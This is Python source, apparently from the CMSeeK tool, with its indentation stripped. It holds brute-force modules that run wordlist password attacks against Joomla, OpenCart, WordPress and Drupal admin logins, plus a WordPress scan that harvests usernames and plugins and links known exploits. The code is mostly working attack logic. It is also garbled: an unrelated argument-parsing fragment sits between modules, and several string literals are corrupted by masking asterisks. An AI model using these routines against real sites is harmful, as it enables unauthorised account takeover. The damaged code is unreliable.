def start():
cmseek.clearscreen()
cmseek.banner("Joomla Bruteforce Module")
url = cmseek.targetinp("") # input('Enter Url: ')
cmseek.info("Checking for Joomla")
bsrc = cmseek.getsource(url, cmseek.randomua('foodislove'))
joomcnf = '0'
if bsrc[0] != '1':
cmseek.error("Could not get target source, CMSeek is quitting")
cmseek.handle_quit()
else:
## Parse generator meta tag
parse_generator = generator.parse(bsrc[1])
ga = parse_generator[0]
ga_content = parse_generator[1]
try1 = generator.scan(ga_content)
if try1[0] == '1' and try1[1] == 'joom':
joomcnf = '1'
else:
try2 = source.check(bsrc[1], url)
if try2[0] == '1' and try2[1] == 'joom':
joomcnf = '1'
else:
try3 = header.check(bsrc[2]) # Headers Check!
if try3[0] == '1' and try3[1] == 'joom':
joomcnf = '1'
else:
joomcnf = '0'
if joomcnf != '1':
cmseek.error('Could not confirm Joomla... CMSeek is quitting')
cmseek.handle_quit()
else:
cmseek.success(
"Joomla Confirmed... Confirming form and getting token...")
joomloginsrc = cmseek.getsource(url + '/administrator/index.php',
cmseek.randomua('thatsprettygay'))
if joomloginsrc[0] == '1' and '<form' in joomloginsrc[1]:
# joomtoken = re.findall(r'type=\"hidden\" name=\"(.*?)\" value=\"1\"', joomloginsrc[1])
# if len(joomtoken) == 0:
# cmseek.error('Unable to get token... CMSeek is quitting!')
# cmseek.handle_quit()
# cmseek.success("Token grabbed successfully: " + cmseek.bold + joomtoken[0] + cmseek.cln)
# token = joomtoken[0]
joomparamuser = []
rawuser = input(
"[~] Enter Usernames with coma as separation without any space (example: cris,harry): "
).split(',')
for rusr in rawuser:
joomparamuser.append(rusr)
joombruteusers = set(
joomparamuser
) ## Strip duplicate usernames in case any smartass didn't read the full thing and entered admin as well
for user in joombruteusers:
passfound = '0'
print('\n')
cmseek.info("Bruteforcing User: "******"wordlist/passwords.txt", "r")
passwords = pwd_file.read().split('\n')
passwords.insert(0, user)
for password in passwords:
if password != '' and password != '\n':
sys.stdout.write('[*] Testing Password: '******'%s\r\r' % password)
sys.stdout.flush()
# print("Testing Pass: "******"Ret URL: " + str(cursrc[3]))
if 'logout' in str(cursrc[1]):
print('\n')
cmseek.success('Password found!')
print(" |\n |--[username]--> " + cmseek.bold +
user + cmseek.cln +
"\n |\n |--[password]--> " + cmseek.bold +
password + cmseek.cln + "\n |")
cmseek.success('Enjoy The Hunt!')
cmseek.savebrute(url,
url + '/administrator/index.php',
user, password)
passfound = '1'
break
else:
continue
break
if passfound == '0':
cmseek.error('\n\nCould Not find Password!')
print('\n\n')
else:
cmseek.error("Couldn't find login form... CMSeeK is quitting")
cmseek.handle_quit()
cua = args.user_agent
elif args.random_agent is not None:
cua = cmseek.randomua('random')
else:
cua = None
if args.googlebot:
cua = 'Googlebot/2.1 (+http://www.google.com/bot.html)'
if args.url is not None:
s = args.url
target = cmseek.process_url(s)
if target != '0':
if cua == None:
cua = cmseek.randomua()
core.main_proc(target, cua)
cmseek.handle_quit()
elif args.list is not None:
sites = args.list
cmseek.clearscreen()
cmseek.banner("CMS Detection And Deep Scan")
sites_list = []
try:
ot = open(sites, 'r')
file_contents = ot.read().replace('\n', '')
sites_list = file_contents.split(',')
except FileNotFoundError:
cmseek.error('Invalid path! CMSeeK is quitting')
cmseek.bye()
if sites_list != []:
if cua == None:
cua = cmseek.randomua()
def start():
cmseek.clearscreen()
cmseek.banner("OpenCart Bruteforce Module")
url = cmseek.targetinp("") # input('Enter Url: ')
cmseek.info("Checking for OpenCart")
bsrc = cmseek.getsource(url, cmseek.randomua('foodislove'))
if bsrc[0] != '1':
cmseek.error("Could not get target source, CMSeek is quitting")
cmseek.handle_quit()
else:
try1 = source.generator(bsrc[1])
if try1[0] == '1' and try1[1] == 'oc':
occnf = '1'
else:
try2 = source.check(bsrc[1], url)
if try2[0] == '1' and try2[1] == 'oc':
occnf = '1'
else:
occnf = '0'
if occnf != '1':
cmseek.error('Could not confirm OpenCart... CMSeek is quitting')
cmseek.handle_quit()
else:
cmseek.success(
"OpenCart Confirmed... Checking for OpenCart login form")
ocloginsrc = cmseek.getsource(url + '/admin/index.php',
cmseek.randomua('thatsprettygay'))
if ocloginsrc[0] == '1' and '<form' in ocloginsrc[
1] and 'route=common/login' in ocloginsrc[1]:
cmseek.success("Login form found!")
ocparamuser = ['']
rawuser = input(
"[~] Enter Usernames with coma as separation without any space (example: cris,harry): "
).split(',')
for rusr in rawuser:
ocparamuser.append(rusr)
ocbruteusers = set(ocparamuser) ## Strip duplicate usernames
for user in ocbruteusers:
if user != '':
passfound = '0'
print('\n')
cmseek.info("Bruteforcing User: "******"wordlist/passwords.txt", "r")
passwords = pwd_file.read().split('\n')
for password in passwords:
if password != '' and password != '\n':
sys.stdout.write('[*] Testing Password: '******'%s\r\r' % password)
sys.stdout.flush()
cursrc = testlogin(url, user, password)
if 'route=common/dashboard&user_token=' in str(
cursrc[3]):
cmseek.success('Password found!')
print(" |\n |--[username]--> " + cmseek.bold +
user + cmseek.cln +
"\n |\n |--[password]--> " +
cmseek.bold + password + cmseek.cln +
"\n |")
cmseek.success('Enjoy The Hunt!')
cmseek.savebrute(url, url + '/admin/index.php',
user, password)
passfound = '1'
break
else:
continue
break
if passfound == '0':
cmseek.error('\n\nCould Not find Password!')
print('\n\n')
else:
cmseek.error("Couldn't find login form... CMSeeK is quitting")
cmseek.handle_quit()
def start():
cmseek.clearscreen()
cmseek.banner("WordPress Bruteforce Module")
url = cmseek.targetinp("") # input('Enter Url: ')
cmseek.info("Checking for WordPress")
bsrc = cmseek.getsource(
url,
cmseek.randomua('thiscanbeanythingasfarasnowletitbewhatilovethemost'))
if bsrc[0] != '1':
# print(bsrc[1])
cmseek.error("Could not get target source, CMSeek is quitting")
cmseek.handle_quit()
else:
## Parse generator meta tag
parse_generator = generator.parse(bsrc[1])
ga = parse_generator[0]
ga_content = parse_generator[1]
try1 = generator.scan(ga_content)
if try1[0] == '1' and try1[1] == 'wp':
wpcnf = '1'
else:
try2 = source.check(bsrc[1], url)
if try2[0] == '1' and try2[1] == 'wp':
wpcnf = '1'
else:
wpcnf = '0'
if wpcnf != '1':
print(bsrc[1])
cmseek.error('Could not confirm WordPress... CMSeek is quitting')
cmseek.handle_quit()
else:
cmseek.success(
"WordPress Confirmed... Checking for WordPress login form")
wploginsrc = cmseek.getsource(url + '/wp-login.php',
cmseek.randomua('thatsprettygay'))
if wploginsrc[0] == '1' and '<form' in wploginsrc[1]:
cmseek.success(
"Login form found.. Detecting Username For Bruteforce")
wpparamuser = []
uenum = wp_user_enum.start('wp', url, cmseek.randomua('r'), '0',
bsrc[1])
usernamesgen = uenum[0]
wpparamuser = uenum[1]
if wpparamuser == []:
customuser = input(
"[~] CMSeek could not enumerate usernames, enter username if you know any: "
)
if customuser == "":
cmseek.error("No user found, CMSeek is quitting")
else:
wpparamuser.append(customuser)
wpbruteusers = set(wpparamuser)
for user in wpbruteusers:
passfound = '0'
print('\n')
cmseek.info("Bruteforcing User: "******"wordlist/passwords.txt", "r")
passwords = pwd_file.read().split('\n')
passwords.insert(0, user)
for password in passwords:
if password != '' and password != '\n':
sys.stdout.write('[*] Testing Password: '******'%s\r\r' % password)
sys.stdout.flush()
cursrc = cmseek.wpbrutesrc(url, user, password)
if 'wp-admin' in str(cursrc[3]):
cmseek.success('Password found!')
print(" |\n |--[username]--> " + cmseek.bold +
user + cmseek.cln +
"\n |\n |--[password]--> " + cmseek.bold +
password + cmseek.cln + "\n |")
cmseek.success('Enjoy The Hunt!')
cmseek.savebrute(url, url + '/wp-login.php', user,
password)
passfound = '1'
break
else:
continue
break
if passfound == '0':
cmseek.error('\n\nCould Not find Password!')
print('\n\n')
else:
cmseek.error("Couldn't find login form... CMSeeK is quitting")
# print(wploginsrc[1])
cmseek.handle_quit()
def start():
cmseek.clearscreen()
cmseek.banner("Drupal Bruteforce Module")
url = cmseek.targetinp("") # input('Enter Url: ')
cmseek.info("Checking for Drupal")
bsrc = cmseek.getsource(url, cmseek.randomua('onceuponatime'))
if bsrc[0] != '1':
cmseek.error("Could not get target source, CMSeek is quitting")
cmseek.handle_quit()
else:
## Parse generator meta tag
parse_generator = generator.parse(bsrc[1])
ga = parse_generator[0]
ga_content = parse_generator[1]
try1 = generator.scan(ga_content)
if try1[0] == '1' and try1[1] == 'dru':
drucnf = '1'
else:
try2 = source.check(
bsrc[1],
url) # Confirming Drupal using other source code checks
if try2[0] == '1' and try2[1] == 'dru':
drucnf = '1'
else:
try3 = header.check(bsrc[2]) # Headers Check!
if try3[0] == '1' and try3[1] == 'dru':
drucnf = '1'
else:
drucnf = '0'
if drucnf != '1':
cmseek.error('Could not confirm Drupal... CMSeek is quitting')
cmseek.handle_quit()
else:
cmseek.success("Drupal Confirmed... Checking for Drupal login form")
druloginsrc = cmseek.getsource(
url + '/user/login/',
cmseek.randomua('therelivedaguynamedkakashi'))
if druloginsrc[0] == '1' and '<form' in druloginsrc[
1] and 'name="form_id" value="' in druloginsrc[1]:
cmseek.success("Login form found! Retriving form id value")
fid = re.findall(r'name="form_id" value="(.*?)"', druloginsrc[1])
if fid == []:
cmseek.error("Could not find form_id, CMSeeK is quitting!")
cmseek.handle_quit()
else:
cmseek.success('form_id found: ' + cmseek.bold + fid[0] +
cmseek.cln)
form_id = fid[0]
druparamuser = ['']
rawuser = input(
"[~] Enter Usernames with coma as separation without any space (example: cris,harry): "
).split(',')
for rusr in rawuser:
druparamuser.append(rusr)
drubruteusers = set(druparamuser) ## Strip duplicate usernames
for user in drubruteusers:
if user != '':
print('\n')
cmseek.info("Bruteforcing User: "******"wordlist/passwords.txt", "r")
passwords = pwd_file.read().split('\n')
passwords.insert(0, user)
passfound = '0'
for password in passwords:
if password != '' and password != '\n':
sys.stdout.write('[*] Testing Password: '******'%s\r\r' % password)
sys.stdout.flush()
cursrc = testlogin(url, user, password, form_id)
# print(cursrc)
if '/user/login/' in str(cursrc):
continue
else:
cmseek.success('Password found! \n\n\n')
# print (cursrc)
cmseek.success('Password found!')
print(" |\n |--[username]--> " + cmseek.bold +
user + cmseek.cln +
"\n |\n |--[password]--> " +
cmseek.bold + password + cmseek.cln +
"\n |")
cmseek.success('Enjoy The Hunt!')
cmseek.savebrute(url, url + '/user/login',
user, password)
passfound = '1'
break
break
if passfound == '0':
cmseek.error('\n\nCould Not find Password!')
print('\n\n')
else:
cmseek.error("Couldn't find login form... CMSeeK is quitting")
cmseek.handle_quit()
def start(id, url, ua, ga, source, detection_method):
'''
id = ID of the cms
url = URL of target
ua = User Agent
ga = [0/1] is GENERATOR meta tag available
source = source code
'''
## Do shits later [update from later: i forgot what shit i had to do ;___;]
if id == "wp":
# referenced before assignment fix
vulnss = version = wpvdbres = result = plugins_found = usernames = usernamesgen = '0'
cmseek.statement('Starting WordPress DeepScan')
# Check if site really is WordPress
if detection_method == 'source':
# well most of the wordpress false positives are from source detections.
cmseek.statement('Checking if the detection is false positive')
temp_domain = re.findall('^(?:https?:\/\/)?(?:[^@\n]+@)?(?:www\.)?([^:\/\n\?\=]+)', url)[0]
wp_match_pattern = temp_domain + '\/wp-(content|include|admin)\/'
if not re.search(wp_match_pattern, source):
cmseek.error('Detection was false positive! CMSeeK is quitting')
cmseek.handle_quit()
# Version detection
version = wordpress_version_detect.start(id, url, ua, ga, source)
## Check for minor stuffs like licesnse readme and some open directory checks
cmseek.statement("Initiating open directory and files check")
## Readme.html
readmesrc = cmseek.getsource(url + '/readme.html', ua)
if readmesrc[0] != '1': ## something went wrong while getting the source codes
cmseek.statement("Couldn't get readme file's source code most likely it's not present")
readmefile = '0' # Error Getting Readme file
elif 'Welcome. WordPress is a very special project to me.' in readmesrc[1]:
readmefile = '1' # Readme file present
else:
readmefile = '2' # Readme file found but most likely it's not of wordpress
## license.txt
licsrc = cmseek.getsource(url + '/license.txt', ua)
if licsrc[0] != '1':
cmseek.statement('license file not found')
licfile = '0'
elif 'WordPress - Web publishing software' in licsrc[1]:
licfile = '1'
else:
licfile = '2'
## wp-content/uploads/ folder
wpupsrc = cmseek.getsource(url + '/wp-content/uploads/', ua)
if wpupsrc[0] != '1':
wpupdir = '0'
elif 'Index of /wp-content/uploads' in wpupsrc[1]:
wpupdir = '1'
else:
wpupdir = '2'
## xmlrpc
xmlrpcsrc = cmseek.getsource(url + '/xmlrpc.php', ua)
if xmlrpcsrc[0] != '1':
cmseek.statement('XML-RPC interface not available')
xmlrpc = '0'
elif 'XML-RPC server accepts POST requests only.' in xmlrpcsrc[1]:
xmlrpc = '1'
else:
xmlrpc = '2'
## Path disclosure
cmseek.statement('Looking for potential path disclosure')
path = path_disclosure.start(url, ua)
if path != "":
cmseek.success('Path disclosure detected, path: ' + cmseek.bold + path + cmseek.cln)
## Check for user registration
usereg = check_reg.start(url,ua)
reg_found = usereg[0]
reg_url = usereg[1]
## Plugins Enumeration
plug_enum = wp_plugins_enum.start(source)
plugins_found = plug_enum[0]
plugins = plug_enum[1]
## Themes Enumeration
theme_enum = wp_theme_enum.start(source,url,ua)
themes_found = theme_enum[0]
themes = theme_enum[1]
## User enumeration
uenum = wp_user_enum.start(id, url, ua, ga, source)
usernamesgen = uenum[0]
usernames = uenum[1]
## Version Vulnerability Detection
if version != '0':
version_vuln = wp_vuln_scan.start(version, ua)
wpvdbres = version_vuln[0]
result = version_vuln[1]
if wpvdbres != '0' and version != '0':
vulnss = len(result['vulnerabilities'])
vfc = version_vuln[2]
### Deep Scan Results comes here
comptime = round(time.time() - cmseek.cstart, 2)
log_dir = cmseek.log_dir
if log_dir is not "":
log_file = log_dir + "/cms.json"
cmseek.clearscreen()
cmseek.banner("Deep Scan Results")
sresult.target(url)
sresult.cms('WordPress', version, 'https://wordpress.org')
#cmseek.result("Detected CMS: ", 'WordPress')
cmseek.update_log('cms_name','WordPress') # update log
#cmseek.result("CMS URL: ", "https://wordpress.org")
cmseek.update_log('cms_url', "https://wordpress.org") # update log
sresult.menu('[WordPress Deepscan]')
item_initiated = False
item_ended = False
if readmefile == '1':
sresult.init_item("Readme file found: " + cmseek.fgreen + url + '/readme.html' + cmseek.cln)
cmseek.update_log('wp_readme_file',url + '/readme.html')
item_initiated = True
if licfile == '1':
cmseek.update_log('wp_license', url + '/license.txt')
if item_initiated == False:
sresult.init_item("License file: " + cmseek.fgreen + url + '/license.txt' + cmseek.cln)
else:
sresult.item("License file: " + cmseek.fgreen + url + '/license.txt' + cmseek.cln)
if wpvdbres == '1':
if item_initiated == False:
sresult.init_item('Changelog: ' + cmseek.fgreen + str(result['changelog_url']) + cmseek.cln)
else:
sresult.item('Changelog: ' + cmseek.fgreen + str(result['changelog_url']) + cmseek.cln)
cmseek.update_log('wp_changelog_file',str(result['changelog_url']))
if wpupdir == '1':
cmseek.update_log('wp_uploads_directory',url + '/wp-content/uploads')
if item_initiated == False:
sresult.init_item("Uploads directory has listing enabled: " + cmseek.fgreen + url + '/wp-content/uploads' + cmseek.cln)
else:
sresult.item("Uploads directory has listing enabled: " + cmseek.fgreen + url + '/wp-content/uploads' + cmseek.cln)
if xmlrpc == '1':
cmseek.update_log('xmlrpc', url + '/xmlrpc.php')
if item_initiated == False:
sresult.init_item("XML-RPC interface: "+ cmseek.fgreen + url + '/xmlrpc.php' + cmseek.cln)
else:
sresult.item("XML-RPC interface: " + cmseek.fgreen + url + '/xmlrpc.php' + cmseek.cln)
if reg_found == '1':
sresult.item('User registration enabled: ' + cmseek.bold + cmseek.fgreen + reg_url + cmseek.cln)
cmseek.update_log('user_registration', reg_url)
if path != "":
sresult.item('Path disclosure: ' + cmseek.bold + cmseek.orange + path + cmseek.cln)
cmseek.update_log('path', path)
if plugins_found != 0:
plugs_count = len(plugins)
sresult.init_item("Plugins Enumerated: " + cmseek.bold + cmseek.fgreen + str(plugs_count) + cmseek.cln)
wpplugs = ""
for i, plugin in enumerate(plugins):
plug = plugin.split(':')
wpplugs = wpplugs + plug[0] + ' Version ' + plug[1] + ','
if i == 0 and i != plugs_count - 1:
sresult.init_sub('Plugin: ' + cmseek.bold + cmseek.fgreen + plug[0] + cmseek.cln)
sresult.init_subsub('Version: ' + cmseek.bold + cmseek.fgreen + plug[1] + cmseek.cln)
sresult.end_subsub('URL: ' + cmseek.fgreen + url + '/wp-content/plugins/' + plug[0] + cmseek.cln)
elif i == plugs_count - 1:
sresult.empty_sub()
sresult.end_sub('Plugin: ' + cmseek.bold + cmseek.fgreen + plug[0] + cmseek.cln)
sresult.init_subsub('Version: ' + cmseek.bold + cmseek.fgreen + plug[1] + cmseek.cln, True, False)
sresult.end_subsub('URL: ' + cmseek.fgreen + url + '/wp-content/plugins/' + plug[0] + cmseek.cln, True, False)
else:
sresult.empty_sub()
sresult.sub_item('Plugin: ' + cmseek.bold + cmseek.fgreen + plug[0] + cmseek.cln)
sresult.init_subsub('Version: ' + cmseek.bold + cmseek.fgreen + plug[1] + cmseek.cln)
sresult.end_subsub('URL: ' + cmseek.fgreen + url + '/wp-content/plugins/' + plug[0] + cmseek.cln)
cmseek.update_log('wp_plugins', wpplugs)
sresult.empty_item()
if themes_found != 0:
thms_count = len(themes)
sresult.init_item("Themes Enumerated: " + cmseek.bold + cmseek.fgreen + str(thms_count) + cmseek.cln)
wpthms = ""
for i,theme in enumerate(themes):
thm = theme.split(':')
thmz = thm[1].split('|')
wpthms = wpthms + thm[0] + ' Version ' + thmz[0] + ','
if i == 0 and i != thms_count - 1:
sresult.init_sub('Theme: ' + cmseek.bold + cmseek.fgreen + thm[0] + cmseek.cln)
sresult.init_subsub('Version: ' + cmseek.bold + cmseek.fgreen + thmz[0] + cmseek.cln)
if thmz[1] != '':
sresult.subsub('Theme Zip: ' + cmseek.bold + cmseek.fgreen + url + thmz[1] + cmseek.cln)
sresult.end_subsub('URL: ' + cmseek.fgreen + url + '/wp-content/themes/' + thm[0] + cmseek.cln)
elif i == thms_count - 1:
sresult.empty_sub(True)
sresult.end_sub('Theme: ' + cmseek.bold + cmseek.fgreen + thm[0] + cmseek.cln)
sresult.init_subsub('Version: ' + cmseek.bold + cmseek.fgreen + thmz[0] + cmseek.cln, True, False)
if thmz[1] != '':
sresult.subsub('Theme Zip: ' + cmseek.bold + cmseek.fgreen + url + thmz[1] + cmseek.cln, True, False)
sresult.end_subsub('URL: ' + cmseek.fgreen + url + '/wp-content/themes/' + thm[0] + cmseek.cln, True, False)
else:
sresult.sub_item('Theme: ' + cmseek.bold + cmseek.fgreen + thm[0] + cmseek.cln)
sresult.init_subsub('Version: ' + cmseek.bold + cmseek.fgreen + thmz[0] + cmseek.cln)
if thmz[1] != '':
sresult.subsub('Theme Zip: ' + cmseek.bold + cmseek.fgreen + url + thmz[1] + cmseek.cln)
sresult.end_subsub('URL: ' + cmseek.fgreen + url + '/wp-content/themes/' + thm[0] + cmseek.cln)
cmseek.update_log('wp_themes', wpthms)
sresult.empty_item()
if usernamesgen == '1':
user_count = len(usernames)
sresult.init_item("Usernames harvested: " + cmseek.bold + cmseek.fgreen + str(user_count) + cmseek.cln)
wpunames = ""
for i,u in enumerate(usernames):
wpunames = wpunames + u + ","
if i == 0 and i != user_count - 1:
sresult.init_sub(cmseek.bold + cmseek.fgreen + u + cmseek.cln)
elif i == user_count - 1:
sresult.end_sub(cmseek.bold + cmseek.fgreen + u + cmseek.cln)
else:
sresult.sub_item(cmseek.bold + cmseek.fgreen + u + cmseek.cln)
cmseek.update_log('wp_users', wpunames)
sresult.empty_item()
if version != '0':
# cmseek.result("Version: ", version)
cmseek.update_log('wp_version', version)
if wpvdbres == '1':
sresult.end_item('Version vulnerabilities: ' + cmseek.bold + cmseek.fgreen + str(vulnss) + cmseek.cln)
cmseek.update_log('wp_vuln_count', str(vulnss))
if vulnss > 0:
for i,vuln in enumerate(result['vulnerabilities']):
if i == 0 and i != vulnss - 1:
sresult.empty_sub(False)
sresult.init_sub(cmseek.bold + cmseek.fgreen + str(vuln['title']) + cmseek.cln, False)
sresult.init_subsub("Type: " + cmseek.bold + cmseek.fgreen + str(vuln['vuln_type']) + cmseek.cln, False, True)
sresult.subsub("Link: " + cmseek.bold + cmseek.fgreen + "http://wpvulndb.com/vulnerabilities/" + str(vuln['id']) + cmseek.cln, False, True)
strvuln = str(vuln)
if 'cve' in strvuln:
for ref in vuln['references']['cve']:
sresult.subsub("CVE: " + cmseek.fgreen + "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-" + str(ref) + cmseek.cln, False, True)
if 'exploitdb' in strvuln:
for ref in vuln['references']['exploitdb']:
sresult.subsub("ExploitDB Link: " + cmseek.fgreen + "http://www.exploit-db.com/exploits/" + str(ref) + cmseek.cln, False, True)
if 'metasploit' in strvuln:
for ref in vuln['references']['metasploit']:
sresult.subsub("Metasploit Module: " + cmseek.fgreen + "http://www.metasploit.com/modules/" + str(ref) + cmseek.cln, False, True)
if 'osvdb' in strvuln:
for ref in vuln['references']['osvdb']:
sresult.subsub("OSVDB Link: " + cmseek.fgreen + "http://osvdb.org/" + str(ref) + cmseek.cln, False, True)
if 'secunia' in strvuln:
for ref in vuln['references']['secunia']:
sresult.subsub("Secunia Advisory: " + cmseek.fgreen + "http://secunia.com/advisories/" + str(ref) + cmseek.cln, False, True)
if 'url' in strvuln:
for ref in vuln['references']['url']:
sresult.subsub("Reference: " + cmseek.fgreen + str(ref) + cmseek.cln, False, True)
sresult.end_subsub("Fixed In Version: " + cmseek.bold + cmseek.fgreen + str(vuln['fixed_in']) + cmseek.cln, False, True)
elif i == vulnss - 1:
sresult.empty_sub(False)
sresult.end_sub(cmseek.bold + cmseek.fgreen + str(vuln['title']) + cmseek.cln, False)
sresult.init_subsub("Type: " + cmseek.bold + cmseek.fgreen + str(vuln['vuln_type']) + cmseek.cln, False, False)
sresult.subsub("Link: " + cmseek.bold + cmseek.fgreen + "http://wpvulndb.com/vulnerabilities/" + str(vuln['id']) + cmseek.cln, False, False)
strvuln = str(vuln)
if 'cve' in strvuln:
for ref in vuln['references']['cve']:
sresult.subsub("CVE: " + cmseek.fgreen + "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-" + str(ref) + cmseek.cln, False, False)
if 'exploitdb' in strvuln:
for ref in vuln['references']['exploitdb']:
sresult.subsub("ExploitDB Link: " + cmseek.fgreen + "http://www.exploit-db.com/exploits/" + str(ref) + cmseek.cln, False, False)
if 'metasploit' in strvuln:
for ref in vuln['references']['metasploit']:
sresult.subsub("Metasploit Module: " + cmseek.fgreen + "http://www.metasploit.com/modules/" + str(ref) + cmseek.cln, False, False)
if 'osvdb' in strvuln:
for ref in vuln['references']['osvdb']:
sresult.subsub("OSVDB Link: " + cmseek.fgreen + "http://osvdb.org/" + str(ref) + cmseek.cln, False, False)
if 'secunia' in strvuln:
for ref in vuln['references']['secunia']:
sresult.subsub("Secunia Advisory: " + cmseek.fgreen + "http://secunia.com/advisories/" + str(ref) + cmseek.cln, False, False)
if 'url' in strvuln:
for ref in vuln['references']['url']:
sresult.subsub("Reference: " + cmseek.fgreen + str(ref) + cmseek.cln, False, False)
sresult.end_subsub("Fixed In Version: " + cmseek.bold + cmseek.fgreen + str(vuln['fixed_in']) + cmseek.cln, False, False)
else:
sresult.empty_sub(False)
sresult.sub_item(cmseek.bold + cmseek.fgreen + str(vuln['title']) + cmseek.cln, False)
sresult.init_subsub("Type: " + cmseek.bold + cmseek.fgreen + str(vuln['vuln_type']) + cmseek.cln, False, True)
sresult.subsub("Link: " + cmseek.bold + cmseek.fgreen + "http://wpvulndb.com/vulnerabilities/" + str(vuln['id']) + cmseek.cln, False, True)
strvuln = str(vuln)
if 'cve' in strvuln:
for ref in vuln['references']['cve']:
sresult.subsub("CVE: " + cmseek.fgreen + "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-" + str(ref) + cmseek.cln, False, True)
if 'exploitdb' in strvuln:
for ref in vuln['references']['exploitdb']:
sresult.subsub("ExploitDB Link: " + cmseek.fgreen + "http://www.exploit-db.com/exploits/" + str(ref) + cmseek.cln, False, True)
if 'metasploit' in strvuln:
for ref in vuln['references']['metasploit']:
sresult.subsub("Metasploit Module: " + cmseek.fgreen + "http://www.metasploit.com/modules/" + str(ref) + cmseek.cln, False, True)
if 'osvdb' in strvuln:
for ref in vuln['references']['osvdb']:
sresult.subsub("OSVDB Link: " + cmseek.fgreen + "http://osvdb.org/" + str(ref) + cmseek.cln, False, True)
if 'secunia' in strvuln:
for ref in vuln['references']['secunia']:
sresult.subsub("Secunia Advisory: " + cmseek.fgreen + "http://secunia.com/advisories/" + str(ref) + cmseek.cln, False, True)
if 'url' in strvuln:
for ref in vuln['references']['url']:
sresult.subsub("Reference: " + cmseek.fgreen + str(ref) + cmseek.cln, False, True)
sresult.end_subsub("Fixed In Version: " + cmseek.bold + cmseek.fgreen + str(vuln['fixed_in']) + cmseek.cln, False, True)
sresult.end(str(cmseek.total_requests), str(comptime), log_file)
return
return
